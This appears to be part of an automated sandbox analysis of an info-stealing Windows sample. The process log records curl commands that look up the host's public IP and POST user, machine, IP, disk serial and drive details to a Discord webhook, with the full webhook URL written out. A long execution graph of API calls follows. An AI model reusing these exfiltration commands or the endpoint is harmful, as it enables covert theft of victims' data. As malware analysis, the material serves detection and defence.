                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:05:13:52
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                      Imagebase:0x7ff6dc710000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:05:13:52
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -s https://api.ipify.org
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:5
                                      Start time:05:13:53
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:6
                                      Start time:05:13:54
                                      Start date:30/12/2024
                                      Path:C:\Users\user\AppData\Local\java.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Local\java.exe
                                      Imagebase:0x7ff65e1f0000
                                      File size:290'944 bytes
                                      MD5 hash:E181EB699888D8BBBE0B89D41DF77678
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 47%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:05:13:55
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:05:13:55
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                      Imagebase:0x7ff6dc710000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:05:13:55
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -s https://api.ipify.org
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:10
                                      Start time:05:13:56
                                      Start date:30/12/2024
                                      Path:C:\Windows\System32\curl.exe
                                      Wow64 process (32bit):false
                                      Commandline:curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
                                      Imagebase:0x7ff6ec190000
                                      File size:530'944 bytes
                                      MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                        Execution Graph

                                        Execution Coverage:23.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:29.6%
                                        Total number of Nodes:1725
                                        Total number of Limit Nodes:15
memmove memmove memmove 4842->4847 5233 7ff670fc3c80 4843->5233 4846 7ff670fc1568 4848 7ff670fc15d7 _popen 4846->4848 4849 7ff670fc15d2 4846->4849 4854 7ff670fc15cb _invalid_parameter_noinfo_noreturn 4846->4854 4847->4846 4850 7ff670fc16a0 fgets 4848->4850 4851 7ff670fc1616 4848->4851 4855 7ff670fcda34 _Receive_impl free 4849->4855 4853 7ff670fc170e _pclose 4850->4853 4863 7ff670fc16c4 4850->4863 4852 7ff670fc34a0 8 API calls 4851->4852 4857 7ff670fc1633 4852->4857 4856 7ff670fc1670 4853->4856 4853->4857 4854->4849 4855->4848 4859 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4856->4859 4857->4856 4858 7ff670fc166b 4857->4858 4860 7ff670fc1776 _invalid_parameter_noinfo_noreturn 4857->4860 4861 7ff670fcda34 _Receive_impl free 4858->4861 4862 7ff670fc167f 4859->4862 4861->4856 4862->4672 5227 7ff670fc3200 4863->5227 4865 7ff670fc16f7 fgets 4865->4853 4865->4863 4867 7ff670fc34a0 8 API calls 4866->4867 4868 7ff670fc17e0 GetLogicalDriveStringsA 4867->4868 4869 7ff670fc1bc2 4868->4869 4870 7ff670fc1802 4868->4870 4872 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4869->4872 4870->4869 4871 7ff670fc180d memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 4870->4871 4876 7ff670fc1a75 4871->4876 4890 7ff670fc18ba 4871->4890 4873 7ff670fc1bd4 4872->4873 4894 7ff670fc85b0 4873->4894 4874 7ff670fc34a0 8 API calls 4875 7ff670fc18e3 GetDriveTypeA 4874->4875 4875->4890 4877 7ff670fc1b07 4876->4877 4879 7ff670fc30a0 9 API calls 4876->4879 4878 7ff670fc1b42 4877->4878 4882 7ff670fc30a0 9 API calls 4877->4882 4880 7ff670fc1b83 4878->4880 4883 7ff670fc1b7e 4878->4883 4885 7ff670fc1b77 _invalid_parameter_noinfo_noreturn 4878->4885 4879->4877 4884 7ff670fc2870 _Receive_impl 4 API calls 4880->4884 4882->4878 4886 7ff670fcda34 _Receive_impl free 4883->4886 4887 7ff670fc1bae 
??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 4884->4887 4885->4883 4886->4880 4887->4869 4888 7ff670fc3ac0 9 API calls 4888->4890 4889 7ff670fc1a67 _invalid_parameter_noinfo_noreturn 4891 7ff670fc1a6e _invalid_parameter_noinfo_noreturn 4889->4891 4890->4874 4890->4876 4890->4888 4890->4889 4890->4891 4892 7ff670fcda34 free _Receive_impl 4890->4892 5254 7ff670fc30a0 4890->5254 5274 7ff670fc32e0 4890->5274 4891->4876 4892->4890 4895 7ff670fc86e7 4894->4895 4900 7ff670fc860f 4894->4900 4896 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4895->4896 4898 7ff670fc86fb 4896->4898 4897 7ff670fc8715 5290 7ff670fcaec0 ?_Xlength_error@std@@YAXPEBD 4897->5290 4898->4706 4900->4897 4901 7ff670fc8668 4900->4901 4903 7ff670fc8710 4900->4903 4904 7ff670fc8649 4900->4904 4908 7ff670fc8653 4900->4908 4905 7ff670fcd9f0 4 API calls 4901->4905 4907 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 4903->4907 4906 7ff670fcd9f0 4 API calls 4904->4906 4905->4908 4909 7ff670fc864e 4906->4909 4907->4897 4908->4895 4911 7ff670fc2a40 13 API calls 4908->4911 4909->4908 4910 7ff670fc8661 _invalid_parameter_noinfo_noreturn 4909->4910 4910->4901 4911->4908 4913 7ff670fc34a0 8 API calls 4912->4913 4914 7ff670fc7108 4913->4914 5291 7ff670fc6000 4914->5291 4917 7ff670fc715c 5314 7ff670fca640 4917->5314 4918 7ff670fc7157 4921 7ff670fcda34 _Receive_impl free 4918->4921 4920 7ff670fc7150 _invalid_parameter_noinfo_noreturn 4920->4918 4921->4917 4923 7ff670fcd9f0 4 API calls 4924 7ff670fc71b2 4923->4924 4925 7ff670fc34a0 8 API calls 4924->4925 4926 7ff670fc71f0 4925->4926 5355 7ff670fc6440 4926->5355 4930 7ff670fc7266 4931 7ff670fc8e00 55 API calls 4930->4931 4932 7ff670fc72cc 4931->4932 4933 7ff670fc8e00 55 API calls 4932->4933 4934 7ff670fc7317 4933->4934 4935 7ff670fca640 20 API calls 4934->4935 4936 7ff670fc7366 4935->4936 4937 7ff670fca640 20 API calls 4936->4937 4938 7ff670fc7396 6 API calls 4937->4938 4939 
7ff670fc74b0 4938->4939 4939->4939 5475 7ff670fcb100 4939->5475 4942 7ff670fc759b 4944 7ff670fca640 20 API calls 4942->4944 4943 7ff670fc30a0 9 API calls 4943->4942 4945 7ff670fc75bf 4944->4945 4946 7ff670fcd9f0 4 API calls 4945->4946 4947 7ff670fc75ce 4946->4947 4948 7ff670fc34a0 8 API calls 4947->4948 4949 7ff670fc7613 4948->4949 5502 7ff670fcc6e0 4949->5502 4952 7ff670fc763a 4953 7ff670fc7db4 4952->4953 4954 7ff670fc7652 4952->4954 5586 7ff670fcb3b0 4953->5586 4956 7ff670fc7685 4954->4956 4957 7ff670fc7687 4954->4957 4958 7ff670fc767d 4954->4958 4955 7ff670fcd9f0 4 API calls 4955->4952 4959 7ff670fc34a0 8 API calls 4956->4959 4957->4956 5579 7ff670fc9f80 4957->5579 5571 7ff670fccb90 4958->5571 4962 7ff670fc76dd 4959->4962 4964 7ff670fcc6e0 50 API calls 4962->4964 4967 7ff670fc76ea 4964->4967 4968 7ff670fca640 20 API calls 4967->4968 4970 7ff670fc771a 4968->4970 5527 7ff670fc8ae0 memset 4970->5527 4971 7ff670fc7dfb 5622 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 4971->5622 4974 7ff670fc7e00 4975 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 4974->4975 4981 7ff670fc7e05 4975->4981 4976 7ff670fc7875 4976->4971 4987 7ff670fc788f 4976->4987 4977 7ff670fc7946 memmove 4980 7ff670fc3200 13 API calls 4977->4980 4978 7ff670fc7730 4978->4976 4982 7ff670fc3200 13 API calls 4978->4982 4983 7ff670fc35a0 9 API calls 4978->4983 4979 7ff670fc78d4 4989 7ff670fcd9f0 4 API calls 4979->4989 4984 7ff670fc79ae 4980->4984 4985 7ff670fc83b8 4981->4985 4991 7ff670fc34a0 8 API calls 4981->4991 4982->4978 4983->4978 4990 7ff670fc3200 13 API calls 4984->4990 4988 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 4985->4988 4986 7ff670fc78f2 4986->4977 4987->4974 4987->4977 4987->4979 4987->4986 4992 7ff670fc7939 4987->4992 4994 7ff670fc83c7 4988->4994 4995 7ff670fc78ed 4989->4995 5000 7ff670fc7a0b 4990->5000 4996 7ff670fc7e84 GetUserNameW 4991->4996 4993 7ff670fcd9f0 4 API calls 4992->4993 4993->4986 4994->4713 4995->4986 4997 7ff670fc7932 
_invalid_parameter_noinfo_noreturn 4995->4997 4998 7ff670fc21a0 10 API calls 4996->4998 4997->4992 5001 7ff670fc7eaf 4998->5001 4999 7ff670fc7a86 5007 7ff670fcda34 _Receive_impl free 4999->5007 5000->4999 5002 7ff670fc7a8b 5000->5002 5006 7ff670fc7a7f _invalid_parameter_noinfo_noreturn 5000->5006 5009 7ff670fc2cc0 42 API calls 5001->5009 5003 7ff670fc7ad6 5002->5003 5004 7ff670fc7ad1 5002->5004 5008 7ff670fc7aca _invalid_parameter_noinfo_noreturn 5002->5008 5541 7ff670fc61c0 CreatePipe 5003->5541 5010 7ff670fcda34 _Receive_impl free 5004->5010 5006->4999 5007->5002 5008->5004 5012 7ff670fc7edf 5009->5012 5010->5003 5014 7ff670fc20b0 _Receive_impl 2 API calls 5012->5014 5013 7ff670fc4530 9 API calls 5015 7ff670fc7b1c 5013->5015 5016 7ff670fc7eec 5014->5016 5557 7ff670fc3ac0 5015->5557 5018 7ff670fc34a0 8 API calls 5016->5018 5020 7ff670fc7f15 GetComputerNameW 5018->5020 5024 7ff670fc21a0 10 API calls 5020->5024 5021 7ff670fc7b65 5025 7ff670fc7b98 5021->5025 5029 7ff670fc7b91 _invalid_parameter_noinfo_noreturn 5021->5029 5022 7ff670fc7b9d 5023 7ff670fc7bff 5022->5023 5026 7ff670fc7bfa 5022->5026 5031 7ff670fc7bf3 _invalid_parameter_noinfo_noreturn 5022->5031 5027 7ff670fc7c56 5023->5027 5033 7ff670fc7c51 5023->5033 5036 7ff670fc7c4a _invalid_parameter_noinfo_noreturn 5023->5036 5028 7ff670fc7f40 5024->5028 5030 7ff670fcda34 _Receive_impl free 5025->5030 5032 7ff670fcda34 _Receive_impl free 5026->5032 5034 7ff670fc7cb8 5027->5034 5039 7ff670fc7cb3 5027->5039 5043 7ff670fc7cac _invalid_parameter_noinfo_noreturn 5027->5043 5038 7ff670fc2cc0 42 API calls 5028->5038 5029->5025 5030->5022 5031->5026 5032->5023 5037 7ff670fcda34 _Receive_impl free 5033->5037 5035 7ff670fc2870 _Receive_impl 4 API calls 5034->5035 5041 7ff670fc7d03 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5035->5041 5036->5033 5037->5027 5042 7ff670fc7f70 5038->5042 5040 7ff670fcda34 _Receive_impl free 5039->5040 5040->5034 5044 7ff670fca640 20 API 
calls 5041->5044 5045 7ff670fc20b0 _Receive_impl 2 API calls 5042->5045 5043->5039 5046 7ff670fc7d35 5044->5046 5047 7ff670fc7f7d 5045->5047 5048 7ff670fc7d7c 5046->5048 5051 7ff670fc7d77 5046->5051 5054 7ff670fc7d70 _invalid_parameter_noinfo_noreturn 5046->5054 5049 7ff670fc34a0 8 API calls 5047->5049 5052 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5048->5052 5050 7ff670fc7fa6 5049->5050 5053 7ff670fc1450 38 API calls 5050->5053 5055 7ff670fcda34 _Receive_impl free 5051->5055 5056 7ff670fc7d8d 5052->5056 5057 7ff670fc7fb0 5053->5057 5054->5051 5055->5048 5056->4713 5058 7ff670fc34a0 8 API calls 5057->5058 5059 7ff670fc7fd9 GetVolumeInformationW 5058->5059 5060 7ff670fc808e 5059->5060 5061 7ff670fc8029 5059->5061 5062 7ff670fc34a0 8 API calls 5060->5062 5063 7ff670fc3280 __stdio_common_vswprintf_s 5061->5063 5064 7ff670fc808c 5062->5064 5065 7ff670fc8043 5063->5065 5066 7ff670fc34a0 8 API calls 5064->5066 5067 7ff670fc21a0 10 API calls 5065->5067 5068 7ff670fc80dc memset GetVersionExW 5066->5068 5069 7ff670fc804f 5067->5069 5070 7ff670fc8113 GetModuleHandleW GetProcAddress 5068->5070 5071 7ff670fc810c 5068->5071 5074 7ff670fc2cc0 42 API calls 5069->5074 5072 7ff670fc8135 5070->5072 5073 7ff670fc8139 5070->5073 5076 7ff670fc81e3 5071->5076 5077 7ff670fc8195 5071->5077 5072->5071 5083 7ff670fc1390 __stdio_common_vswprintf 5073->5083 5075 7ff670fc807f 5074->5075 5079 7ff670fc20b0 _Receive_impl 2 API calls 5075->5079 5078 7ff670fc34a0 8 API calls 5076->5078 5080 7ff670fc21a0 10 API calls 5077->5080 5082 7ff670fc81e1 5078->5082 5079->5064 5081 7ff670fc81a1 5080->5081 5085 7ff670fc2cc0 42 API calls 5081->5085 5084 7ff670fc34a0 8 API calls 5082->5084 5083->5072 5086 7ff670fc8249 5084->5086 5087 7ff670fc81d4 5085->5087 5088 7ff670fc1780 52 API calls 5086->5088 5089 7ff670fc20b0 _Receive_impl 2 API calls 5087->5089 5090 7ff670fc8256 5088->5090 5089->5082 5091 7ff670fc85b0 23 API calls 5090->5091 5092 7ff670fc828f 5091->5092 5093 7ff670fc34a0 8 API calls 
5092->5093 5094 7ff670fc82da 5093->5094 5095 7ff670fc70a0 204 API calls 5094->5095 5099 7ff670fc82ed 5095->5099 5096 7ff670fc8342 5097 7ff670fc8395 5096->5097 5100 7ff670fc8390 5096->5100 5102 7ff670fc8389 _invalid_parameter_noinfo_noreturn 5096->5102 5098 7ff670fc9ea0 24 API calls 5097->5098 5098->4985 5099->5096 5099->5102 5103 7ff670fcda34 _Receive_impl free 5099->5103 5101 7ff670fcda34 _Receive_impl free 5100->5101 5101->5097 5102->5100 5103->5096 5895 7ff670fc1010 5104->5895 5106 7ff670fc32a6 __stdio_common_vswprintf_s 5106->4679 5108 7ff670fc13ce 5107->5108 5109 7ff670fc13b3 5107->5109 5110 7ff670fc13e8 __stdio_common_vswprintf 5108->5110 5109->4686 5110->5109 5115 7ff670fc9eb9 5111->5115 5118 7ff670fc9f33 5111->5118 5112 7ff670fc9ed8 5114 7ff670fc9f28 5112->5114 5116 7ff670fc9f4b _invalid_parameter_noinfo_noreturn 5112->5116 5117 7ff670fcda34 _Receive_impl free 5114->5117 5115->5112 5896 7ff670fc83e0 5115->5896 5119 7ff670fca640 20 API calls 5116->5119 5117->5118 5118->4649 5120 7ff670fc9f70 5119->5120 5120->4649 5123 7ff670fc36f9 5122->5123 5127 7ff670fc35d0 5122->5127 5210 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5123->5210 5125 7ff670fc36fe 5128 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5125->5128 5126 7ff670fcd9f0 4 API calls 5129 7ff670fc361b 5126->5129 5127->5129 5130 7ff670fc3660 5127->5130 5131 7ff670fc3628 5127->5131 5137 7ff670fc3635 5127->5137 5134 7ff670fc3704 5128->5134 5132 7ff670fc36c0 _invalid_parameter_noinfo_noreturn 5129->5132 5135 7ff670fc36c7 memmove 5129->5135 5136 7ff670fc367c memmove 5129->5136 5133 7ff670fcd9f0 4 API calls 5130->5133 5131->5125 5131->5137 5132->5135 5133->5129 5140 7ff670fc36be 5135->5140 5138 7ff670fc369e 5136->5138 5139 7ff670fc36b3 5136->5139 5137->5126 5138->5132 5138->5139 5141 7ff670fcda34 _Receive_impl free 5139->5141 5140->4817 5141->5140 5143 7ff670fc3a39 5142->5143 5147 7ff670fc38f8 5142->5147 5211 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5143->5211 5145 7ff670fc395d 5148 
7ff670fcd9f0 4 API calls 5145->5148 5146 7ff670fc3a3e 5150 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5146->5150 5147->5145 5149 7ff670fc3943 5147->5149 5151 7ff670fc3950 5147->5151 5152 7ff670fc3988 5147->5152 5148->5149 5153 7ff670fc39f5 _invalid_parameter_noinfo_noreturn 5149->5153 5156 7ff670fc39a8 memmove memmove 5149->5156 5157 7ff670fc39fc 5149->5157 5155 7ff670fc3a44 ?uncaught_exceptions@std@ 5150->5155 5151->5145 5151->5146 5154 7ff670fcd9f0 4 API calls 5152->5154 5153->5157 5154->5149 5158 7ff670fc3a63 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5155->5158 5159 7ff670fc3a6d 5155->5159 5160 7ff670fc39d3 5156->5160 5161 7ff670fc39e8 5156->5161 5163 7ff670fc3a04 memmove 5157->5163 5158->5159 5159->4817 5160->5153 5160->5161 5162 7ff670fcda34 _Receive_impl free 5161->5162 5164 7ff670fc39f3 5162->5164 5163->5164 5164->4817 5166 7ff670fc38a6 5165->5166 5170 7ff670fc373f 5165->5170 5212 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5166->5212 5168 7ff670fc37a9 5171 7ff670fcd9f0 4 API calls 5168->5171 5169 7ff670fc38ab 5173 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5169->5173 5170->5168 5172 7ff670fc378f 5170->5172 5174 7ff670fc37d8 5170->5174 5175 7ff670fc379c 5170->5175 5171->5172 5176 7ff670fc385b _invalid_parameter_noinfo_noreturn 5172->5176 5179 7ff670fc3862 memmove 5172->5179 5180 7ff670fc380d memmove memset 5172->5180 5178 7ff670fc38b1 5173->5178 5177 7ff670fcd9f0 4 API calls 5174->5177 5175->5168 5175->5169 5176->5179 5177->5172 5184 7ff670fc3859 5179->5184 5181 7ff670fc384e 5180->5181 5182 7ff670fc3839 5180->5182 5183 7ff670fcda34 _Receive_impl free 5181->5183 5182->5176 5182->5181 5183->5184 5184->4817 5186 7ff670fc2a6e 5185->5186 5187 7ff670fc2b49 5186->5187 5193 7ff670fc2a84 5186->5193 5213 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5187->5213 5188 7ff670fc2a8a 5188->4823 5190 7ff670fc2b4e 5194 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5190->5194 5191 7ff670fc2aba 5195 
7ff670fcd9f0 4 API calls 5191->5195 5192 7ff670fc2b1e memmove 5192->4823 5193->5188 5193->5190 5193->5191 5193->5192 5196 7ff670fc2b19 5193->5196 5198 7ff670fc2b54 5194->5198 5199 7ff670fc2ad0 5195->5199 5197 7ff670fcd9f0 4 API calls 5196->5197 5197->5192 5214 7ff670fc2870 5198->5214 5201 7ff670fc2b12 _invalid_parameter_noinfo_noreturn 5199->5201 5202 7ff670fc2ad8 5199->5202 5201->5196 5202->5192 5204 7ff670fc2bdb 5204->4823 5205 7ff670fc2bca 5206 7ff670fcda34 _Receive_impl free 5205->5206 5206->5204 5224 7ff670fc1250 __std_exception_copy 5207->5224 5215 7ff670fc28df ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 5214->5215 5219 7ff670fc2889 5214->5219 5216 7ff670fc2920 _invalid_parameter_noinfo_noreturn 5215->5216 5217 7ff670fc2974 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5216->5217 5218 7ff670fc2943 5216->5218 5217->5204 5217->5205 5220 7ff670fc296c 5218->5220 5222 7ff670fc298b _invalid_parameter_noinfo_noreturn 5218->5222 5219->5216 5221 7ff670fcda34 _Receive_impl free 5219->5221 5223 7ff670fcda34 _Receive_impl free 5220->5223 5221->5215 5223->5217 5225 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5224->5225 5226 7ff670fc12b2 _CxxThrowException __std_exception_copy 5225->5226 5226->4813 5228 7ff670fc3223 memmove 5227->5228 5229 7ff670fc3262 5227->5229 5228->4865 5231 7ff670fc38c0 12 API calls 5229->5231 5232 7ff670fc3275 5231->5232 5232->4865 5234 7ff670fc3de8 5233->5234 5238 7ff670fc3cb0 5233->5238 5253 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5234->5253 5236 7ff670fc3d15 5239 7ff670fcd9f0 4 API calls 5236->5239 5237 7ff670fc3ded 5241 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5237->5241 5238->5236 5240 7ff670fc3cfb 5238->5240 5242 7ff670fc3d40 5238->5242 5243 7ff670fc3d08 5238->5243 5239->5240 5244 7ff670fc3dad _invalid_parameter_noinfo_noreturn 5240->5244 5247 7ff670fc3db4 memmove memmove 5240->5247 5248 7ff670fc3d67 memmove memmove 5240->5248 5246 
7ff670fc3df3 5241->5246 5245 7ff670fcd9f0 4 API calls 5242->5245 5243->5236 5243->5237 5244->5247 5245->5240 5252 7ff670fc3dab 5247->5252 5249 7ff670fc3da0 5248->5249 5250 7ff670fc3d8b 5248->5250 5251 7ff670fcda34 _Receive_impl free 5249->5251 5250->5244 5250->5249 5251->5252 5252->4846 5255 7ff670fc30bd memmove 5254->5255 5259 7ff670fc30e7 5254->5259 5255->4890 5256 7ff670fc31ec 5289 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5256->5289 5259->5256 5263 7ff670fc3141 5259->5263 5264 7ff670fc3179 5259->5264 5265 7ff670fc3133 5259->5265 5260 7ff670fc31f1 5266 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5260->5266 5261 7ff670fcd9f0 4 API calls 5261->5265 5262 7ff670fc3181 memmove 5267 7ff670fc31cf 5262->5267 5268 7ff670fc31a2 5262->5268 5263->5260 5263->5261 5271 7ff670fcd9f0 4 API calls 5264->5271 5265->5262 5269 7ff670fc31e5 _invalid_parameter_noinfo_noreturn 5265->5269 5270 7ff670fc31f7 5266->5270 5267->4890 5268->5269 5272 7ff670fc31c7 5268->5272 5269->5256 5271->5265 5273 7ff670fcda34 _Receive_impl free 5272->5273 5273->5267 5275 7ff670fc331f ?good@ios_base@std@ 5274->5275 5276 7ff670fc3318 5274->5276 5277 7ff670fc3333 5275->5277 5283 7ff670fc3361 5275->5283 5276->5275 5282 7ff670fc3349 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5277->5282 5277->5283 5278 7ff670fc343a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 5280 7ff670fc3474 5278->5280 5281 7ff670fc346a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5278->5281 5279 7ff670fc33d4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5285 7ff670fc33f4 5279->5285 5280->4890 5281->5280 5282->5283 5283->5278 5283->5279 5284 7ff670fc342a 5283->5284 5286 7ff670fc33d1 5283->5286 5287 7ff670fc33a4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5283->5287 5284->5278 5285->5284 5288 7ff670fc33fd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5285->5288 5286->5279 5287->5283 
5288->5285 5292 7ff670fc6045 CryptStringToBinaryA 5291->5292 5293 7ff670fc6042 5291->5293 5294 7ff670fc6073 5292->5294 5295 7ff670fc619b 5292->5295 5293->5292 5296 7ff670fc60b0 CryptStringToBinaryA 5294->5296 5623 7ff670fcc8d0 5294->5623 5297 7ff670fc11e0 9 API calls 5295->5297 5302 7ff670fc6178 5296->5302 5303 7ff670fc60ed 5296->5303 5300 7ff670fc61ac _CxxThrowException 5297->5300 5301 7ff670fc6098 memset 5301->5296 5639 7ff670fc11e0 __std_exception_copy 5302->5639 5305 7ff670fc34a0 8 API calls 5303->5305 5309 7ff670fc610d 5305->5309 5307 7ff670fc614d 5310 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5307->5310 5308 7ff670fc6148 5312 7ff670fcda34 _Receive_impl free 5308->5312 5309->5307 5309->5308 5311 7ff670fc6141 _invalid_parameter_noinfo_noreturn 5309->5311 5313 7ff670fc6160 5310->5313 5311->5308 5312->5307 5313->4917 5313->4918 5313->4920 5315 7ff670fca67d 5314->5315 5316 7ff670fcaad9 5315->5316 5317 7ff670fca73d 5315->5317 5318 7ff670fca6b7 5315->5318 5340 7ff670fca9be 5315->5340 5319 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5316->5319 5322 7ff670fcab03 5317->5322 5323 7ff670fca759 5317->5323 5346 7ff670fca766 5317->5346 5320 7ff670fca6e7 5318->5320 5318->5322 5326 7ff670fca6da 5318->5326 5321 7ff670fc7195 5319->5321 5354 7ff670fca734 5320->5354 5653 7ff670fcccf0 5320->5653 5321->4923 5683 7ff670fcaec0 ?_Xlength_error@std@@YAXPEBD 5322->5683 5328 7ff670fcc3a0 5 API calls 5323->5328 5324 7ff670fca9e1 5331 7ff670fcaa9b 5324->5331 5337 7ff670fcaa45 5324->5337 5344 7ff670fca9ef 5324->5344 5325 7ff670fcaaaa 5327 7ff670fcc470 19 API calls 5325->5327 5643 